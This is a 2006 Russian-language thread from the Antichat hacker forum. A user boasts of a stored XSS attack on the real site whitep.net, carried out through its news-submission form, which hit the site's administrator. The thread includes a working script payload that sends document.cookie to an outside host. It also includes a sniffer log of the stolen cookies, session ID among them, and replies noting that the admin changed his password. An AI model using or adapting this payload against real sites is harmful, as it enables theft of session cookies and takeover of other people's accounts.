Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS на whitep.net (https://forum.antichat.xyz/showthread.php?t=15575)

•••™NO FEAR™••• 07.03.2006 17:18
XSS на whitep.net
 
Вот нашёл XSS на _http://whitep.net/
Сам скрипт который мы отсылаем в _http://whitep.net/modules.php (в добавлении новостей)
Код:
<script>img = new Image(); img.src = "http://s.netsec.ru/nofear/pic.gif?"+document.cookie;</script>
Новость сначало отсылается администратору, затем только тогда он добавляет её сам, ну и ему получается приходит наше сообщение, затем мы просто принимаем куки на снифе:

Код:
Date        07.03.2006 15:02       
IP        ***********       
Real Ip        ***********       
Referer        http://whitep.net/modules.php       
Query        modtids=,; forum_read=a:1:{i:3;i:1141736162;}; topicsread=a:1:{i:46;i:1141736168;}; session_id=24123b67852c03e898fdea85869bf25e; hotlog=1       
Browser        Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50

GreenBear 07.03.2006 17:21
хм, наверно это на всех спайзах такое есть, где новости посылать можно...
помоему там код видно будет еще...

•••™NO FEAR™••• 07.03.2006 17:25
Цитата:
хм, наверно это на всех спайзах такое есть, где новости посылать можно...
помоему там код видно будет еще...
А чё это за движёк? Всмысле видно? Невидно его, я же только что пробывал.
P.S зайди в аську, дело есть!

GreenBear 07.03.2006 17:35
Это ихмо спайз или пхпнюке

я грил видно =))
если бы не видно, не сменил бы он так быстро пасс


Время: 11:31